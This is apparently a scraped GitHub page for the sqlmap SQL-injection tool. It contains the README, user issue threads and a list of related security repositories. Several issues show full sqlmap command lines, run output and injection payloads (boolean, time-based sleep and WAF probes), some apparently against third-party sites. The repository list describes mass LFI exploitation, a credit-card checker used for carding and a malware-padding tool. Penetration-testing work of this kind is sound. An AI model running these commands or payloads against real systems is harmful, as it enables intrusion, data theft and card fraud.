Automatic SQL injection and database takeover tool

Overview

sqlmap

Build Status Python 2.6|2.7|3.x License GitHub closed issues Twitter

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

sqlmap is sponsored by SpyderSec.

Screenshots

Screenshot

You can visit the collection of screenshots demonstrating some of the features on the wiki.

Installation

You can download the latest tarball by clicking here or latest zipball by clicking here.

Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6, 2.7 and 3.x on any platform.

Usage

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the user's manual.

Links

Translations

Comments
  • SQLmap and CVE-2014-1854

    SQLmap and CVE-2014-1854

    Hi,

    Attempting to fully exploit the following vulnerability with sqlmap: http://www.exploit-db.com/exploits/31834/

    You can download the Turnkey Wordpress appliance, then download the vulnerable version of adrotate here:

    http://downloads.wordpress.org/plugin/adrotate.3.9.4.zip

    Simply upload the zip and activate the plugin, you will be vulnerable. I can successfully exploit the SQLi using the PoC and various tinkerings. The fun thing about it is the SQLi result shows up in the Location header (and your HTTP code is 302, instead of 200 when it doesn't work). I have set --code=302 as well as --string='Location:', but I can't get SQLmap to detect it.

    You also must use --tamper=base64encode.

    A problem seems to be there is no body. The result of the first column selected in the payload is put in the Location header.

    opened by brandonprry 38
  • sqlmapapi prot question

    sqlmapapi prot question

    I would like to ask, sqlmapapi if activated will open a port, if I think this port can only visit a ip, sqlmap can be set up?If the port has been scanned, it means that others can access and use.

    enhancement normal miscellaneous 
    opened by M7lrv 28
  • Tor not working

    Tor not working

    can someone tell me, why I gets this error, when I use tor? In normal connecting without tor, all working.

    using python version 2.7
    sqlmap {1.0-dev-nongit-20150919}

    https://gyazo.com/e3ab8127d02ed761fe4723d2b17d43c4

    I use sqlmap.py -u "host" --dbs --tor --tor-type=SOCKS5 --tor-port=9150 --random-agent

    support 
    opened by Pablossoo 23
  • "sqlmap [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)"

    Hi Running sqlmap 1.0-dev, Kali linux up to date, tomcat 7, and latest WebGoat v5.4

    I can log into WebGoat via the browser http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100 with the login and password.

    I then tried to execute this:

    sqlmap -u "http://localhost:8080/WebGoat-5.4/attack?Screen=153&menu=1100" --banner --auth-type="Basic" --auth-cred="webgoat:webgoat"

    but it gives me:

    [*] starting at 17:11:09

    [17:11:09] [INFO] testing connection to the target URL [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401) [17:11:09] [WARNING] HTTP error codes detected during run: 401 (Unauthorized) - 1 times

    [*] shutting down at 17:11:09

    I did read the manual page and googled the terms “CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials” read some web sites, but still, I’m stumped. I have read the following links:

    https://github.com/sqlmapproject/sqlmap/issues/542 https://github.com/sqlmapproject/sqlmap/issues/125 http://tech4castblog.wordpress.com/2012/04/20/webgoat-http-authentication-type-and-valid-credentials-401-5/ (so is there a way to specify the port number 8080 to sqlmap? Shouldn’t sqlmap be able to figure out the port number since it’s specified in the URL?…is this the cause of error?)

    http://comments.gmane.org/gmane.comp.security.sqlmap/234

    the above came from the following google terms: “sqlmap [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)”

    Appreciate some help. Thanks. Gordon

    bug normal request 
    opened by gordonmasec 23
  • [CRITICAL] unable to retrieve the database names

    [CRITICAL] unable to retrieve the database names

    Hello! Why does not searchable database! I have changed in the Tour test comparison page

    C:\Python27\sqlmap>sqlmap.py -u "http://[REDACTED]/ksjh_list.aspx?year=2011"
    --level 5 --risk 3 --batch --tamper=between,charunicodeencode --dbs --dbms "Micr
    osoft SQL Server"
    
    
    
    [09:54:27] [WARNING] parameter length constraint mechanism detected (e.g. Suhosi
    n patch). Potential problems in enumeration phase can be expected
    GET parameter 'year' is vulnerable. Do you want to keep testing the others (if a
    ny)? [y/N] N
    sqlmap identified the following injection points with a total of 531 HTTP(s) req
    uests:
    
    ---
    Place: GET
    Parameter: year
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: year=2011 AND 2168=2168
    
    ---
    [09:54:27] [WARNING] changes made by tampering scripts are not included in shown
     payload content(s)
    [09:54:27] [INFO] testing MySQL
    [09:54:27] [WARNING] the back-end DBMS is not MySQL
    [09:54:27] [INFO] testing Oracle
    [09:54:28] [WARNING] the back-end DBMS is not Oracle
    [09:54:28] [INFO] testing PostgreSQL
    [09:54:29] [WARNING] the back-end DBMS is not PostgreSQL
    [09:54:29] [INFO] testing Microsoft SQL Server
    [09:54:29] [INFO] confirming Microsoft SQL Server
    [09:54:31] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2008
    web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
    back-end DBMS: Microsoft SQL Server 2008
    [09:54:31] [INFO] fetching database names
    [09:54:31] [INFO] fetching number of databases
    [09:54:31] [WARNING] running in a single-thread mode. Please consider usage of o
    ption '--threads' for faster data retrieval
    [09:54:31] [INFO] retrieved:
    [09:54:33] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    [09:54:33] [ERROR] unable to retrieve the number of databases
    [09:54:33] [INFO] retrieved:
    [09:54:36] [INFO] falling back to current database
    [09:54:36] [INFO] fetching current database
    [09:54:36] [INFO] retrieved:
    [09:54:40] [CRITICAL] unable to retrieve the database names
    [09:54:40] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 145 times
    
    [*] shutting down at 09:54:40
    
    
    C:\Python27\sqlmap>
    
    invalid support 
    opened by aiongw 23
  • sqlmap missing mandatory options!

    sqlmap missing mandatory options!

    I wanted to start SQLmap on kali linux but i got the following error: sqlmap error: missing a mandatory option (-d, -u, -l , -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or --h for advanced help.

    So i updated Kali Linux, still no fix. Then i downloaded it on windows with Python. still the same error...

    I hope you can help me.

    invalid 
    opened by dispater13 22
  • [CRITICAL] unable to execute operating system commands via the back-end DBMS

    [CRITICAL] unable to execute operating system commands via the back-end DBMS

    Hello, could you explain me pls what does it meen this error and what can i change in comnnad that this error delete. THANKS!

    ./sqlmap.py -u http://www.site.com/category.asp?category_id=6 --os-cmd -v l [00:54:07] [INFO] resuming back-end DBMS 'microsoft sql server' [00:54:07] [INFO] testing connection to the target URL

    sqlmap resumed the following injection point(s) from stored session:

    Parameter: category_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: category_id=6 AND 2290=2290

    [00:54:08] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, Microsoft IIS 7.5, ASP back-end DBMS: Microsoft SQL Server 2008 [00:54:08] [CRITICAL] unable to execute operating system commands via the back-end DBMS

    [*] shutting down at 00:54:08

    support 
    opened by AVR1234 22
  • ridiculous sqlmap issue

    ridiculous sqlmap issue

    The number of times where I've had a straight forward injection and sqlmap has failed to exploit it is unbelievable.

    One example was with a parameter vulnerable to time based sql injection after the order by clause, so the payload would be: vulnerableparameter=2,sleep(2)

    Another payload that works is: vulnerableparameter=2,(select/**/sleep(10)/**/from/**/dual/**/where/**/2/**/=/**/5)

    and then sqlmap should expand on that to get database,tables names etc.. etc. If it tries to end the query, it will break e.g using # or -- or any other comments it will break, so I told sqlmap not to use any and since spaces are not allowed, I also made it use mysql comments.

    I've tried: sqlmap.py -u "http://example.com/?vulnerableparameter=2" -p "vulnerableparameter" --prefix="," --suffix="" --technique=T --dbs --dbms=mysql --level=5 --risk=3 --tamper=space2comment

    and unbelievably, it said it was not injectable, unreal.

    How can sqlmap fail to find such simple injections?

    invalid 
    opened by crossedz 22
  • Asynchronous RESTful API to interact with sqlmap engine

    Asynchronous RESTful API to interact with sqlmap engine

    Design and develop an asynchronous RESTful API to interact with sqlmap engine. This is useful to use/call sqlmap from custom scripts, web interface, third-party tools or similar as opposed to use it from command line or wrap it as in a call similar to os.popen('sqlmap...').

    This API will replace the XML-RPC service (#287).

    enhancement normal miscellaneous 
    opened by bdamele 22
  • Skip sqlmap waf testing

    Skip sqlmap waf testing

    When I try to start testing with sqlmap, sqlmap will send queries like these :

    1'tFmggO<'">AeQpzc

    1"(,..,'(,,

    And my target will response with error 500 and sqlmap will show me connection dropped

    I tested my target manualy and it is okey

    So how should I skip those two queries? Or in which files I can comment this lines?

    Regards

    opened by johnyjin 20
  • can't injection eg. id[*]=0

    can't injection eg. id[*]=0

    id[*]=0 I want to inject inside like this: id[' aNd select * from user#]=1 or this: id[' aNd select * from user#]=

    but.. sqlmap payload: id[' aNd select * from user# 從我的 MI6,使用 FastHub 發送。

    從我的 MI6,使用 FastHub 發送。

    support 
    opened by 687766616e 20
Releases(1.7)
Log4j-Scanner with Bind-Receipt and custom hostnames

Hrafna - Log4j-Scanner for the masses Features Scanning-system designed to check your own infra for vulnerable log4j-installations start and stop scan

18 Jan 23, 2022
CVE-2022-22965 - CVE-2010-1622 redux

CVE-2022-22965 - vulnerable app and PoC Trial & error $ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:la

Duarte Duarte 20 Aug 25, 2022
SSRF search vulnerabilities exploitation extended.

This tool search for SSRF using predefined settings in different parts of a request (path, host, headers, post and get parameters).

Andri Wahyudi 13 Jul 04, 2021
This is a simple PoC for the newly found Polkit error names PwnKit

A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz

Kim Schulz 16 Sep 06, 2022
Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems

KCMTicketFormatter This tools takes the output from https://github.com/fireeye/SSSDKCMExtractor and turns it into properly formatted CCACHE files for

Black Lantern Security 35 Oct 25, 2022
Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI

LFI-Hunter Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI A script written in

Anukul Pandey 6 Jan 30, 2022
zip-brute Zip File Password Cracking with Using Password List

Zip brute is a python script that cracks zip that are password protected using a wordlist dictionary.

AnonyminHack5 13 Nov 03, 2022
Make files with as many random bytes as you want

Lots o' Bytes 🔣 Make files with as many random bytes as you want! Use case Can be used to package malware that is normally small by making the downlo

Addi 1 Jan 13, 2022
Python Library For Ethical Hacker

Python Library For Ethical Hacker

11 Nov 03, 2022
Credit Card And SK Checker Written In Python

💳 Credit Card Checker (CC Checker) & Mass SK Checker & Generator 💳

Rimuru Tempest 53 Dec 31, 2022
ssh-audit is a tool for ssh server & client configuration auditing.

SSH server & client auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)

Joe Testa 1.4k Dec 31, 2022
Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

Pachine Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation). Installtion $ pip3 install impacket Usage Impacket v0.9.23 -

Oliver Lyak 250 Dec 31, 2022
Easily retargetable and hackable interactive disassembler with IDAPython-compatible plugin API

ScratchABit is an interactive incremental disassembler with data/control flow analysis capabilities. ScratchABit is dedicated to the effor

Paul Sokolovsky 380 Dec 28, 2022
POC for detecting the Log4Shell (Log4J RCE) vulnerability

Interactsh An OOB interaction gathering server and client library Features • Usage • Interactsh Client • Interactsh Server • Interactsh Integration •

ProjectDiscovery 2.1k Jan 08, 2023
NS-Defacer: a auto html injecter, In other words It's a auto defacer to deface a lot of websites in less time

Overview NS-Defacer is a auto html injecter, In other words It's a auto defacer

NightSec 10 Nov 19, 2022
IDAPatternSearch adds a capability of finding functions according to bit-patterns into the well-known IDA Pro disassembler based on Ghidra’s function patterns format.

IDA Pattern Search by Argus Cyber Security Ltd. The IDA Pattern Search plugin adds a capability of finding functions according to bit-patterns into th

David Lazar 48 Dec 29, 2022
A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228

1.Create a Sample Vulnerable Application . 2.Start a netcat listner . 3.Run the exploit . 5.Use jdk1.8.0_20 for better results . Exploit-db - https://

Isuru Umayanga 7 Aug 06, 2022
Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.

Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.

Astro 9 Sep 27, 2022
NS-LOOKUP - A python script for scanning website for getting ip address of a website

NS-LOOKUP A python script for scanning website for getting ip address of a websi

Spider Anongreyhat 5 Aug 02, 2022